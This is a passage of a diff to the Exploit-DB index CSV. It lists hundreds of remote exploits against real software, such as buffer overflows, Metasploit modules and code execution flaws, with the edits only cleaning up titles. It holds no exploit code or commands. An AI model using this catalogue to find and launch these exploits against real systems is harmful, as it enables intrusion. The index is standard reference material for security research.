(Metasploit)",2011-12-27,"Fady Mohammed Osman",windows,remote,0 18291,platforms/hardware/remote/18291.txt,"Reaver - WiFi Protected Setup (WPS) Exploit",2011-12-30,cheffner,hardware,remote,0 18984,platforms/multiple/remote/18984.rb,"Apache Struts 2.2.1.1 - Remote Command Execution (Metasploit)",2012-06-05,Metasploit,multiple,remote,0 -18345,platforms/windows/remote/18345.py,"TFTP Server 1.4 - ST (RRQ) Buffer Overflow",2012-01-10,b33f,windows,remote,0 -18354,platforms/windows/remote/18354.py,"WorldMail IMAPd 3.0 - Overflow (SEH) (Egg Hunter)",2012-01-12,TheXero,windows,remote,0 +18345,platforms/windows/remote/18345.py,"TFTP Server 1.4 - ST 'RRQ' Buffer Overflow",2012-01-10,b33f,windows,remote,0 +18354,platforms/windows/remote/18354.py,"WorldMail IMAPd 3.0 - Overflow (SEH) (Egghunter)",2012-01-12,TheXero,windows,remote,0 18376,platforms/windows/remote/18376.rb,"McAfee SaaS MyCioScan ShowReport - Remote Command Execution (Metasploit)",2012-01-17,Metasploit,windows,remote,0 18365,platforms/windows/remote/18365.rb,"Microsoft Internet Explorer - JavaScript OnLoad Handler Remote Code Execution (MS05-054) (Metasploit)",2012-01-14,Metasploit,windows,remote,0 18367,platforms/windows/remote/18367.rb,"XAMPP - WebDAV PHP Upload (Metasploit)",2012-01-14,Metasploit,windows,remote,0 @@ -11797,7 +11799,7 @@ id,file,description,date,author,platform,type,port 18674,platforms/windows/remote/18674.txt,"Quest InTrust 10.4.x - Annotation Objects ActiveX Control 'AnnotateX.dll' Uninitialized Pointer Remote Code Execution",2012-03-28,rgod,windows,remote,0 18675,platforms/hardware/remote/18675.txt,"TRENDnet SecurView TV-IP121WN Wireless Internet Camera - UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow",2012-03-28,rgod,hardware,remote,0 18679,platforms/multiple/remote/18679.rb,"Java - AtomicReferenceArray Type Violation (Metasploit)",2012-03-30,Metasploit,multiple,remote,0 -18683,platforms/windows/remote/18683.py,"MailMax 4.6 - POP3 'USER' Remote Buffer Overflow (No Login Needed)",2012-03-30,localh0t,windows,remote,0 +18683,platforms/windows/remote/18683.py,"MailMax 4.6 - POP3 'USER' Unauthenticated Remote Buffer Overflow",2012-03-30,localh0t,windows,remote,0 18709,platforms/windows/remote/18709.rb,"TRENDnet SecurView Internet Camera - UltraMJCam OpenFileDlg Buffer Overflow (Metasploit)",2012-04-06,Metasploit,windows,remote,0 18714,platforms/windows/remote/18714.rb,"LANDesk Lenovo ThinkManagement Console - Remote Command Execution (Metasploit)",2012-04-08,Metasploit,windows,remote,0 18718,platforms/windows/remote/18718.txt,"Distinct TFTP Server 3.01 - Directory Traversal",2012-04-08,modpr0be,windows,remote,0 @@ -11990,14 +11992,14 @@ id,file,description,date,author,platform,type,port 19581,platforms/windows/remote/19581.txt,"Avirt Gateway Suite 3.3 a/3.5 - Mail Server Buffer Overflow (2)",1999-10-31,"dark spyrit",windows,remote,0 19584,platforms/windows/remote/19584.c,"Sky Communications Skyfull 1.1.4 Mail Server - MAIL FROM Buffer Overflow",1999-10-30,UNYUN,windows,remote,0 19586,platforms/windows/remote/19586.c,"BTD Studio Zom-Mail 1.0.9 - Buffer Overflow",1999-11-02,UNYUN,windows,remote,0 -19587,platforms/windows/remote/19587.txt,"AN-HTTPd 1.2b - CGI Vulnerabilities",1999-11-02,UNYUN,windows,remote,0 +19587,platforms/windows/remote/19587.txt,"AN-HTTPd 1.2b - CGI Exploits",1999-11-02,UNYUN,windows,remote,0 19588,platforms/windows/remote/19588.c,"IBM HomePagePrint 1.0 7 - Buffer Overflow",1999-11-02,UNYUN,windows,remote,0 19589,platforms/windows/remote/19589.txt,"Avirt Gateway Suite 3.3/3.3 a/3.5 - Directory Creation",1999-10-31,"Jesús López de Aguileta",windows,remote,0 19591,platforms/windows/remote/19591.txt,"Microsoft Internet Explorer 4/5 / Outlook 98 - window.open Redirect",1999-11-04,"Georgi Guninski",windows,remote,0 19592,platforms/windows/remote/19592.asm,"Real Networks GameHouse dldisplay ActiveX control - Port Buffer Overflow (1)",1999-11-04,"dark spyrit",windows,remote,0 19593,platforms/windows/remote/19593.c,"Real Networks GameHouse dldisplay ActiveX control - Port Buffer Overflow (2)",1999-11-04,"dark spyrit",windows,remote,0 19595,platforms/windows/remote/19595.c,"Computer Software Manufaktur Alibaba 2.0 - Multiple CGI Vulnerabilities",1999-11-03,Kerb,windows,remote,0 -19603,platforms/windows/remote/19603.txt,"Microsoft Internet Explorer 4.x/5 / Outlook 2000 0/98 0/Express 4.x - ActiveX CAB File Execution",1999-11-08,Mukund,windows,remote,0 +19603,platforms/windows/remote/19603.txt,"Microsoft Internet Explorer 4.x/5 / Outlook 2000 0/98 0/Express 4.x - ActiveX '.CAB' File Execution",1999-11-08,Mukund,windows,remote,0 20122,platforms/windows/remote/20122.rb,"Microsoft Office SharePoint Server 2007 - Remote Code Execution (MS10-104) (Metasploit)",2012-07-31,Metasploit,windows,remote,8082 20120,platforms/windows/remote/20120.pl,"httpdx 1.5.4 - Remote Heap Overflow",2012-07-29,st3n,windows,remote,0 19903,platforms/multiple/remote/19903.txt,"Gossamer Threads DBMan 2.0.4 - DBMan Information Leakage",2000-05-05,"Black Watch Labs",multiple,remote,0 @@ -12045,7 +12047,7 @@ id,file,description,date,author,platform,type,port 19717,platforms/java/remote/19717.rb,"Java Applet - Field Bytecode Verifier Cache Remote Code Execution (Metasploit)",2012-07-11,Metasploit,java,remote,0 19718,platforms/windows/remote/19718.rb,"AdminStudio - 'LaunchHelp.dll' ActiveX Arbitrary Code Execution (Metasploit)",2012-07-11,Metasploit,windows,remote,0 19719,platforms/windows/remote/19719.txt,"Microsoft Internet Explorer 4.0/4.0.1/5.0/5.0.1/5.5 - preview Security Zone Settings Lag",2000-01-07,"Georgi Guninski",windows,remote,0 -19722,platforms/unix/remote/19722.txt,"RedHat 6.1 / IRIX 6.5.18 - lpd Vulnerabilities",2000-01-11,anonymous,unix,remote,0 +19722,platforms/unix/remote/19722.txt,"RedHat 6.1 / IRIX 6.5.18 - 'lpd' Exploit",2000-01-11,anonymous,unix,remote,0 19724,platforms/windows/remote/19724.txt,"Mirabilis ICQ 0.99b 1.1.1.1/3.19 - Remote Buffer Overflow",2000-01-12,"Drew Copley",windows,remote,0 19729,platforms/linux/remote/19729.c,"Qualcomm qpopper 3.0 - 'LIST' Buffer Overflow",2000-01-10,Zhodiac,linux,remote,0 19730,platforms/windows/remote/19730.c,"A-V Tronics InetServ 3.0 - WebMail GET Exploit",2000-01-17,"Greg Hoglund",windows,remote,0 @@ -12253,7 +12255,7 @@ id,file,description,date,author,platform,type,port 20238,platforms/cgi/remote/20238.txt,"Alabanza Control Panel 3.0 - Domain Modification",2000-09-24,"Weihan Leow",cgi,remote,0 20240,platforms/windows/remote/20240.txt,"Microsoft Windows Media Player 7 - Embedded OCX Control",2000-09-26,"Ussr Labs",windows,remote,0 20242,platforms/cgi/remote/20242.txt,"Unixware 7.0 - SCOhelp HTTP Server Format String",2000-09-26,"Juliano Rizzo",cgi,remote,0 -20243,platforms/windows/remote/20243.html,"Microsoft Windows Script Host 5.1/5.5 - GetObject() File Disclosure",2000-09-26,"Georgi Guninski",windows,remote,0 +20243,platforms/windows/remote/20243.html,"Microsoft Windows Script Host 5.1/5.5 - 'GetObject()' File Disclosure",2000-09-26,"Georgi Guninski",windows,remote,0 20244,platforms/cgi/remote/20244.txt,"TalentSoft Web+ Client/Monitor/server 4.6 - Internal IP Address Disclosure",2000-09-27,"Delphis Consulting",cgi,remote,0 20245,platforms/cgi/remote/20245.txt,"TalentSoft Web+ Client/Monitor/server 4.6 - Source Code Disclosure",2000-09-27,"Delphis Consulting",cgi,remote,0 20246,platforms/linux/remote/20246.txt,"TalentSoft Web+ Application Server (Linux) 4.6 - Example Script File Disclosure",2000-09-26,DCIST,linux,remote,0 @@ -12478,7 +12480,7 @@ id,file,description,date,author,platform,type,port 20727,platforms/linux/remote/20727.c,"NTPd - Remote Buffer Overflow",2001-04-04,"babcia padlina ltd",linux,remote,0 20730,platforms/unix/remote/20730.c,"IPFilter 3.x - Fragment Rule Bypass",2001-04-09,"Thomas Lopatic",unix,remote,0 20731,platforms/bsd/remote/20731.c,"FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x - FTPd 'glob()' Buffer Overflow",2001-04-14,"fish stiqz",bsd,remote,0 -20732,platforms/freebsd/remote/20732.pl,"FreeBSD 4.2-stable - FTPd 'glob()' Buffer Overflow Vulnerabilities",2001-04-16,"Elias Levy",freebsd,remote,0 +20732,platforms/freebsd/remote/20732.pl,"FreeBSD 4.2-stable - FTPd 'glob()' Buffer Overflow",2001-04-16,"Elias Levy",freebsd,remote,0 20733,platforms/openbsd/remote/20733.c,"OpenBSD 2.x < 2.8 FTPd - 'glob()' Buffer Overflow",2001-04-16,"Elias Levy",openbsd,remote,0 20738,platforms/multiple/remote/20738.txt,"PGP 5.x/6.x/7.0 - ASCII Armor Parser Arbitrary File Creation",2001-04-09,"Chris Anley",multiple,remote,0 20744,platforms/cgi/remote/20744.pl,"nph-maillist 3.0/3.5 - Arbitrary Code Execution",2001-04-10,Kanedaaa,cgi,remote,0 @@ -12592,7 +12594,7 @@ id,file,description,date,author,platform,type,port 20993,platforms/unix/remote/20993.c,"XFree86 X11R6 3.3 XDM - Session Cookie Guessing",2001-06-24,"ntf & sky",unix,remote,0 20994,platforms/linux/remote/20994.txt,"Cobalt Raq3 PopRelayD - Arbitrary SMTP Relay",2001-07-04,"Andrea Barisani",linux,remote,0 20998,platforms/linux/remote/20998.c,"xloadimage 4.1 - Buffer Overflow",2001-07-10,"zenith parsec",linux,remote,0 -21002,platforms/multiple/remote/21002.txt,"Apache 1.3 - Possible Directory Index Disclosure",2001-07-10,Kevin,multiple,remote,0 +21002,platforms/multiple/remote/21002.txt,"Apache 1.3 - Directory Index Disclosure",2001-07-10,Kevin,multiple,remote,0 21003,platforms/windows/remote/21003.txt,"Microsoft Outlook 98/2000/2002 - Unauthorized Email Access",2001-07-12,"Georgi Guninski",windows,remote,0 21004,platforms/windows/remote/21004.txt,"Microsoft Outlook 98/2000/2002 - Arbitrary Code Execution",2001-07-12,"Georgi Guninski",windows,remote,0 21008,platforms/cgi/remote/21008.txt,"Interactive story 1.3 - Directory Traversal",2001-07-15,qDefense,cgi,remote,0 @@ -12835,7 +12837,7 @@ id,file,description,date,author,platform,type,port 21651,platforms/windows/remote/21651.txt,"Microsoft SQL Server 2000 - sp_MScopyscript SQL Injection",2002-07-25,"Cesar Cerrudo",windows,remote,0 21652,platforms/windows/remote/21652.cpp,"Microsoft SQL Server 2000 - Resolution Service Heap Overflow",2002-07-25,"David Litchfield",windows,remote,0 21654,platforms/windows/remote/21654.c,"IPSwitch IMail 6.x/7.0/7.1 - Web Messaging GET Buffer Overflow",2002-07-25,anonymous,windows,remote,0 -21662,platforms/windows/remote/21662.txt,"Microsoft Outlook Express 6 - XML File Attachment Script Execution",2002-07-29,http-equiv,windows,remote,0 +21662,platforms/windows/remote/21662.txt,"Microsoft Outlook Express 6 - '.XML' File Attachment Script Execution",2002-07-29,http-equiv,windows,remote,0 21663,platforms/linux/remote/21663.c,"Fake Identd 0.9/1.x - Client Query Remote Buffer Overflow",2002-07-25,Jedi/Sector,linux,remote,0 21670,platforms/windows/remote/21670.txt,"Microsoft Windows Media Player 6/7 - Filename Buffer Overflow",2002-07-30,ken@FTU,windows,remote,0 21671,platforms/unix/remote/21671.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Exploit",2002-07-30,spabam,unix,remote,80 @@ -12890,7 +12892,7 @@ id,file,description,date,author,platform,type,port 21804,platforms/windows/remote/21804.c,"Trillian 0.6351/0.7x - Identd Buffer Overflow",2002-09-18,"Lance Fitz-Herbert",windows,remote,0 21808,platforms/windows/remote/21808.txt,"Microsoft VM 2000/3000/3100/3188/3200/3300/3802/3805 series - JDBC Class Code Execution",2002-09-19,anonymous,windows,remote,0 21810,platforms/windows/remote/21810.c,"Trillian 0.73/0.74 - IRC PRIVMSG Buffer Overflow",2002-09-19,"Lance Fitz-Herbert",windows,remote,0 -21812,platforms/windows/remote/21812.txt,"Microsoft Word 95/97/98/2000/2002 - INCLUDEPICTURE Document Sharing File Disclosure",2002-09-20,"Richard Edwards",windows,remote,0 +21812,platforms/windows/remote/21812.txt,"Microsoft Word 95/97/98/2000/2002 - 'INCLUDEPICTURE' Document Sharing File Disclosure",2002-09-20,"Richard Edwards",windows,remote,0 21818,platforms/linux/remote/21818.c,"Null HTTPd 0.5 - Remote Heap Overflow",2002-09-23,eSDee,linux,remote,0 21882,platforms/unix/remote/21882.txt,"Apache Tomcat 3.2 - Directory Disclosure",2002-10-01,"HP Security",unix,remote,0 21883,platforms/windows/remote/21883.html,"Microsoft Internet Explorer 5 - Document Reference Zone Bypass",2002-10-01,"Liu Die Yu",windows,remote,0 @@ -12908,7 +12910,7 @@ id,file,description,date,author,platform,type,port 21850,platforms/linux/remote/21850.rb,"Samba 3.4.16/3.5.14/3.6.4 - SetInformationPolicy AuditEventsInfo Heap Overflow (Metasploit)",2012-10-10,Metasploit,linux,remote,0 21851,platforms/unix/remote/21851.rb,"Webmin 1.580 - '/file/show.cgi' Remote Command Execution (Metasploit)",2012-10-10,Metasploit,unix,remote,10000 21852,platforms/unix/remote/21852.rb,"QNX QCONN - Remote Command Execution (Metasploit)",2012-10-10,Metasploit,unix,remote,0 -21853,platforms/unix/remote/21853.txt,"Apache Tomcat 3/4 - DefaultServlet File Disclosure",2002-09-24,"Rossen Raykov",unix,remote,0 +21853,platforms/unix/remote/21853.txt,"Apache Tomcat 3/4 - 'DefaultServlet' File Disclosure",2002-09-24,"Rossen Raykov",unix,remote,0 21857,platforms/linux/remote/21857.pl,"Monkey HTTP Server 0.1.4 - File Disclosure",2002-09-25,DownBload,linux,remote,0 21858,platforms/linux/remote/21858.txt,"ACWeb 1.14/1.8 - Cross-Site Scripting",2002-09-25,DownBload,linux,remote,0 21868,platforms/ios/remote/21868.rb,"Apple iOS Mobile Safari - LibTIFF Buffer Overflow (Metasploit)",2012-10-09,Metasploit,ios,remote,0 @@ -13010,7 +13012,7 @@ id,file,description,date,author,platform,type,port 22194,platforms/windows/remote/22194.txt,"Microsoft Windows XP/2000/NT 4.0 - Locator Service Buffer Overflow",2003-01-22,"David Litchfield",windows,remote,0 22200,platforms/multiple/remote/22200.txt,"SyGate 5.0 - Insecure UDP Source Port Firewall Bypass Weak Default Configuration",2003-01-24,"David Fernández",multiple,remote,0 22201,platforms/multiple/remote/22201.txt,"List Site Pro 2.0 - User Database Delimiter Injection",2003-01-24,Statix,multiple,remote,0 -22205,platforms/linux/remote/22205.txt,"Apache Tomcat 3.x - Null Byte Directory/File Disclosure",2003-01-26,"Jouko Pynnönen",linux,remote,0 +22205,platforms/linux/remote/22205.txt,"Apache Tomcat 3.x - Null Byte Directory / File Disclosure",2003-01-26,"Jouko Pynnönen",linux,remote,0 22213,platforms/windows/remote/22213.txt,"Opera 7.0 - JavaScript Console Attribute Injection",2003-02-04,"GreyMagic Software",windows,remote,0 22217,platforms/windows/remote/22217.txt,"Opera 7 - Image Rendering HTML Injection",2003-02-04,"GreyMagic Software",windows,remote,0 22218,platforms/windows/remote/22218.txt,"Opera 7.0 - History Object Information Disclosure",2003-02-04,"GreyMagic Software",windows,remote,0 @@ -13044,7 +13046,7 @@ id,file,description,date,author,platform,type,port 22314,platforms/unix/remote/22314.c,"Sendmail 8.12.x - Header Processing Buffer Overflow (2)",2003-03-02,bysin,unix,remote,0 22319,platforms/hardware/remote/22319.txt,"HP JetDirect Printer - SNMP JetAdmin Device Password Disclosure",2003-03-03,"Sven Pechler",hardware,remote,0 22327,platforms/multiple/remote/22327.txt,"3Com SuperStack 3 Firewall - Content Filter Bypassing",2003-03-05,bit_logic,multiple,remote,0 -22338,platforms/windows/remote/22338.txt,"Clearswift MAILsweeper 4.x - Malformed MIME Attachment Filter Bypass",2003-03-07,http-equiv,windows,remote,0 +22338,platforms/windows/remote/22338.txt,"Clearswift MAILsweeper 4.x - MIME Attachment Filter Bypass",2003-03-07,http-equiv,windows,remote,0 22341,platforms/windows/remote/22341.txt,"Opera 6.0/7.0 - 'Filename Download' Buffer Overrun",2003-03-10,nesumin,windows,remote,0 22342,platforms/linux/remote/22342.c,"Qpopper 4.0.x - Remote Memory Corruption",2003-03-10,"Florian Heinz",linux,remote,0 22346,platforms/linux/remote/22346.c,"PGP4Pine 1.75.6/1.76 - 'Message Line' Buffer Overflow",2003-03-12,"Eric AUGE",linux,remote,0 @@ -13060,7 +13062,7 @@ id,file,description,date,author,platform,type,port 22368,platforms/windows/remote/22368.txt,"Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Buffer Overflow (4)",2003-03-17,aT4r@3wdesign.es,windows,remote,0 22369,platforms/linux/remote/22369.txt,"Ximian Evolution 1.x - UUEncoding Parsing Memory Corruption",2003-03-17,"Core Security",linux,remote,0 22371,platforms/linux/remote/22371.txt,"Ximian Evolution 1.x - MIME image/* Content-Type Data Inclusion",2003-03-19,"Core Security",linux,remote,0 -22375,platforms/windows/remote/22375.rb,"Aladdin Knowledge System Ltd - ChooseFilePath Buffer Overflow (Metasploit)",2012-11-01,Metasploit,windows,remote,0 +22375,platforms/windows/remote/22375.rb,"Aladdin Knowledge System Ltd - 'ChooseFilePath' Buffer Overflow (Metasploit)",2012-11-01,Metasploit,windows,remote,0 22379,platforms/linux/remote/22379.c,"PXE Server 2.0 - Remote Buffer Overrun",2003-03-13,CrZ,linux,remote,0 22381,platforms/multiple/remote/22381.txt,"SIPS 0.2.2 - User Information Disclosure",2003-03-18,dwcgr0up,multiple,remote,0 22388,platforms/multiple/remote/22388.txt,"WFChat 1.0 - Information Disclosure",2003-03-19,subj,multiple,remote,0 @@ -13142,7 +13144,7 @@ id,file,description,date,author,platform,type,port 22686,platforms/php/remote/22686.rb,"Invision Power Board (IP.Board) 3.3.4 - 'Unserialize()' PHP Code Execution (Metasploit)",2012-11-13,Metasploit,php,remote,0 22691,platforms/windows/remote/22691.txt,"pablo software Solutions baby ftp server 1.2 - Directory Traversal",2003-05-29,dr_insane,windows,remote,0 22696,platforms/php/remote/22696.txt,"PHP 4.x - Transparent Session ID Cross-Site Scripting",2003-05-30,"Sverre H. Huseby",php,remote,0 -22699,platforms/unix/remote/22699.c,"Mod_Gzip 1.3.x - Debug Mode Vulnerabilities",2003-05-06,xCrZx,unix,remote,0 +22699,platforms/unix/remote/22699.c,"Mod_Gzip 1.3.x - Debug Mode",2003-05-06,xCrZx,unix,remote,0 22714,platforms/windows/remote/22714.rb,"Oracle Database Client System Analyzer - Arbitrary File Upload (Metasploit)",2012-11-15,Metasploit,windows,remote,0 22721,platforms/windows/remote/22721.txt,"Pablo Software Solutions FTP Service 1.2 - Anonymous Users Privileges",2003-06-03,JeiAr,windows,remote,0 22722,platforms/windows/remote/22722.txt,"Pablo Software Solutions FTP Service 1.2 - Plaintext Password",2003-06-03,JeiAr,windows,remote,0 @@ -13238,14 +13240,14 @@ id,file,description,date,author,platform,type,port 23093,platforms/windows/remote/23093.txt,"Microsoft Windows XP - TCP Packet Information Leakage",2003-09-02,"Michal Zalewski",windows,remote,0 23094,platforms/windows/remote/23094.txt,"Microsoft Visual Basic For Applications SDK 5.0/6.0/6.2/6.3 - Document Handling Buffer Overrun",2003-09-03,"eEye Digital Security Team",windows,remote,0 23095,platforms/windows/remote/23095.c,"Microsoft Access 97/2000/2002 Snapshot Viewer - ActiveX Control Parameter Buffer Overflow",2003-09-03,"Oliver Lavery",windows,remote,0 -23100,platforms/windows/remote/23100.c,"Ipswitch WS_FTP Server 3.4/4.0 - FTP Command Buffer Overrun Vulnerabilities",2003-09-04,xfocus,windows,remote,0 +23100,platforms/windows/remote/23100.c,"Ipswitch WS_FTP Server 3.4/4.0 - FTP Command Buffer Overrun",2003-09-04,xfocus,windows,remote,0 23113,platforms/windows/remote/23113.c,"Microsoft Exchange Server 4.0/5.0 - SMTP HELO Argument Buffer Overflow",1998-03-10,Rootshell,windows,remote,0 23114,platforms/windows/remote/23114.txt,"Microsoft Internet Explorer 5/6 - Browser Popup Window Object Type Validation",2003-09-07,http-equiv,windows,remote,0 23115,platforms/linux/remote/23115.c,"Mah-Jong 1.4 - Client/Server Remote sscanf() Buffer Overflow",2003-09-07,V9,linux,remote,0 23121,platforms/windows/remote/23121.txt,"Kukol E.V. HTTP & FTP Server Suite 6.2 - File Disclosure",2003-09-08,euronymous,windows,remote,0 23122,platforms/windows/remote/23122.txt,"Microsoft Internet Explorer 5 - XML Page Object Type Validation (MS03-040)",2003-09-08,http-equiv,windows,remote,0 23123,platforms/windows/remote/23123.pl,"Roger Wilco 1.4.1 - Remote Server Side Buffer Overrun",2003-09-08,D4rkGr3y,windows,remote,0 -23131,platforms/windows/remote/23131.txt,"Microsoft Internet Explorer 6 - Script Execution Vulnerabilities",2003-09-10,"Liu Die Yu & Jelmer",windows,remote,0 +23131,platforms/windows/remote/23131.txt,"Microsoft Internet Explorer 6 - Script Execution",2003-09-10,"Liu Die Yu & Jelmer",windows,remote,0 23224,platforms/multiple/remote/23224.rb,"Splunk 5.0 - Custom App Remote Code Execution (Metasploit)",2012-12-09,Metasploit,multiple,remote,0 23135,platforms/windows/remote/23135.txt,"FloosieTek FTGatePro 1.2 - WebAdmin Interface Information Disclosure",2003-09-10,"Phuong Nguyen",windows,remote,0 23136,platforms/multiple/remote/23136.txt,"futurewave webx server 1.1 - Directory Traversal",2003-09-10,dr_insane,multiple,remote,0 @@ -13275,7 +13277,7 @@ id,file,description,date,author,platform,type,port 23188,platforms/linux/remote/23188.c,"Athttpd 0.4b - GET Remote Buffer Overrun",2003-09-25,r-code,linux,remote,0 23196,platforms/linux/remote/23196.c,"WebFS 1.x - 'Pathname' Buffer Overrun",2003-09-29,jsk,linux,remote,0 23198,platforms/windows/remote/23198.txt,"Half-Life 1.1 - Invalid Command Error Response Format String",2003-09-29,"Luigi Auriemma",windows,remote,0 -23199,platforms/multiple/remote/23199.c,"OpenSSL - ASN.1 Parsing Vulnerabilities",2003-10-09,Syzop,multiple,remote,0 +23199,platforms/multiple/remote/23199.c,"OpenSSL - ASN.1 Parsing",2003-10-09,Syzop,multiple,remote,0 23203,platforms/windows/remote/23203.rb,"IBM System Director Agent - DLL Injection (Metasploit)",2012-12-07,Metasploit,windows,remote,0 23209,platforms/windows/remote/23209.txt,"mutant penguin mpweb pro 1.1.2 - Directory Traversal",2003-10-01,"GamaSec Security",windows,remote,0 23211,platforms/windows/remote/23211.cpp,"EarthStation 5 - Search Service Remote File Deletion",2003-10-03,"random nut",windows,remote,0 @@ -13334,7 +13336,7 @@ id,file,description,date,author,platform,type,port 23397,platforms/linux/remote/23397.pl,"Monit 1.4/2.x/3/4 - 'HTTP Request' Buffer Overrun",2003-11-24,Shadowinteger,linux,remote,0 23398,platforms/windows/remote/23398.pl,"Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass Weakness (1)",2003-11-25,"Paul Szabo",windows,remote,0 23399,platforms/windows/remote/23399.pl,"Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass Weakness (2)",2003-11-25,"Paul Szabo",windows,remote,0 -23400,platforms/windows/remote/23400.txt,"Microsoft Outlook Express 6.0 - MHTML Forced File Execution (1)",2003-11-25,"Liu Die",windows,remote,0 +23400,platforms/windows/remote/23400.txt,"Microsoft Outlook Express 6.0 - '.MHTML' Forced File Execution (1)",2003-11-25,"Liu Die",windows,remote,0 23401,platforms/windows/remote/23401.txt,"Microsoft Outlook Express 6.0 - MHTML Forced File Execution (2)",2003-11-25,"Liu Die Yu",windows,remote,0 23405,platforms/multiple/remote/23405.c,"Applied Watch Command Center 1.0 - Authentication Bypass (2)",2003-11-28,"Bugtraq Security",multiple,remote,0 23411,platforms/windows/remote/23411.txt,"Websense Enterprise 4/5 - Blocked Sites Cross-Site Scripting",2003-12-03,"Mr. P.Taylor",windows,remote,0 @@ -13379,7 +13381,7 @@ id,file,description,date,author,platform,type,port 23542,platforms/multiple/remote/23542.c,"lionmax software www file share pro 2.4x - Multiple Vulnerabilities (2)",2004-01-14,"Luigi Auriemma",multiple,remote,0 23544,platforms/windows/remote/23544.txt,"vicomsoft rapidcache server 2.0/2.2.6 - Directory Traversal",2004-01-15,"Peter Winter-Smith",windows,remote,0 23545,platforms/hardware/remote/23545.txt,"Whale Communications e-Gap Security Appliance 2.5 - Login Page Source Code Disclosure",2004-01-15,Procheckup,hardware,remote,0 -23552,platforms/windows/remote/23552.xml,"Sun J2EE/RI 1.4 / Sun JDK 1.4.2 - JDBC Database Insecure Default Policy Vulnerabilities",2004-01-19,"Marc Schoenefeld",windows,remote,0 +23552,platforms/windows/remote/23552.xml,"Sun J2EE/RI 1.4 / Sun JDK 1.4.2 - JDBC Database Insecure Default Policy",2004-01-19,"Marc Schoenefeld",windows,remote,0 23555,platforms/windows/remote/23555.txt,"GoAhead Web Server 2.1.x - Directory Management Policy Bypass",2004-01-19,"Luigi Auriemma",windows,remote,0 23557,platforms/multiple/remote/23557.txt,"aiptek netcam WebServer 0.93.15 - Directory Traversal",2004-01-20,"Rafel Ivgi The-Insider",multiple,remote,0 23559,platforms/windows/remote/23559.txt,"WebTrends Reporting Center 6.1 Management Interface - Full Path Disclosure",2004-01-20,"Oliver Karow",windows,remote,0 @@ -13558,7 +13560,7 @@ id,file,description,date,author,platform,type,port 24259,platforms/linux/remote/24259.c,"Ethereal 0.x - Multiple Unspecified iSNS / SMB / SNMP Protocol Dissector Vulnerabilities",2004-08-05,"Rémi Denis-Courmont",linux,remote,0 24262,platforms/windows/remote/24262.html,"Opera Web Browser 7.5x - IFrame OnLoad Address Bar URL Obfuscation",2004-07-08,"bitlance winter",windows,remote,0 24263,platforms/windows/remote/24263.txt,"Mozilla 1.7 - External Protocol Handler",2004-07-08,"Keith McCanless",windows,remote,0 -24264,platforms/multiple/remote/24264.java,"Sun Java Virtual Machine 1.x - Font.createFont Method Insecure Temporary File Creation",2004-07-09,Jelmer,multiple,remote,0 +24264,platforms/multiple/remote/24264.java,"Sun Java Virtual Machine 1.x - 'Font.createFont' Method Insecure Temporary File Creation",2004-07-09,Jelmer,multiple,remote,0 24265,platforms/windows/remote/24265.html,"Microsoft Internet Explorer 5.0.1 - JavaScript Method Assignment Cross-Domain Scripting",2004-07-12,Paul,windows,remote,0 24266,platforms/windows/remote/24266.txt,"Microsoft Internet Explorer 5.0.1 - Popup.show Mouse Event Hijacking",2004-07-12,Paul,windows,remote,0 24268,platforms/multiple/remote/24268.txt,"Code-Crafters Ability Mail Server 1.18 - 'errormsg' Cross-Site Scripting",2004-07-12,dr_insane,multiple,remote,0 @@ -13680,7 +13682,7 @@ id,file,description,date,author,platform,type,port 24874,platforms/multiple/remote/24874.rb,"Apache Struts - 'ParametersInterceptor' Remote Code Execution (Metasploit)",2013-03-22,Metasploit,multiple,remote,0 24875,platforms/windows/remote/24875.rb,"Sami FTP Server - LIST Command Buffer Overflow (Metasploit)",2013-03-22,Metasploit,windows,remote,0 24876,platforms/windows/remote/24876.rb,"Cool PDF Image Stream - Buffer Overflow (Metasploit)",2013-03-22,Metasploit,windows,remote,0 -24886,platforms/windows/remote/24886.html,"Mitsubishi MX ActiveX Component 3 - 'ActUWzd.dll' (WzTitle) Remote Exploit",2013-03-25,Dr_IDE,windows,remote,0 +24886,platforms/windows/remote/24886.html,"Mitsubishi MX ActiveX Component 3 - 'ActUWzd.dll' 'WzTitle' Remote Exploit",2013-03-25,Dr_IDE,windows,remote,0 24887,platforms/windows/remote/24887.rb,"KingView - Log File Parsing Buffer Overflow (Metasploit)",2013-03-25,Metasploit,windows,remote,0 24888,platforms/linux/remote/24888.rb,"Mutiny - Remote Command Execution (Metasploit)",2013-03-25,Metasploit,linux,remote,0 24891,platforms/windows/remote/24891.rb,"HP Intelligent Management Center - Arbitrary File Upload (Metasploit)",2013-03-26,Metasploit,windows,remote,0 @@ -13747,16 +13749,16 @@ id,file,description,date,author,platform,type,port 25023,platforms/windows/remote/25023.txt,"PGN2WEB 0.3 - Buffer Overflow",2004-12-15,"Tom Palarz",windows,remote,0 25025,platforms/windows/remote/25025.txt,"ABC2PS/JCABC2PS 1.2 - Voice Field Buffer Overflow",2004-12-15,"Tom Palarz",windows,remote,0 25026,platforms/windows/remote/25026.txt,"Mesh Viewer 0.2.2 - Buffer Overflow",2004-12-15,"Mohammed Khan",windows,remote,0 -25027,platforms/windows/remote/25027.txt,"abctab2ps 1.6.3 - Write_Heading Function ABC File Remote Buffer Overflow",2004-12-15,"Limin Wang",windows,remote,0 +25027,platforms/windows/remote/25027.txt,"abctab2ps 1.6.3 - 'Write_Heading' '.ABC' Remote Buffer Overflow",2004-12-15,"Limin Wang",windows,remote,0 25028,platforms/multiple/remote/25028.txt,"CSV2XML 0.5.1 - Buffer Overflow",2004-12-15,"Limin Wang",multiple,remote,0 -25029,platforms/windows/remote/25029.txt,"abctab2ps 1.6.3 - Trim_Title Function ABC File Remote Buffer Overflow",2004-12-15,"Limin Wang",windows,remote,0 +25029,platforms/windows/remote/25029.txt,"abctab2ps 1.6.3 - 'Trim_Title' '.ABC' File Remote Buffer Overflow",2004-12-15,"Limin Wang",windows,remote,0 25030,platforms/linux/remote/25030.txt,"GNU UnRTF 0.19.3 - Font Table Conversion Buffer Overflow",2004-12-15,"Yosef Klein",linux,remote,0 25031,platforms/windows/remote/25031.html,"Microsoft Windows Media Player 9.0 - ActiveX Control Media File Attribute 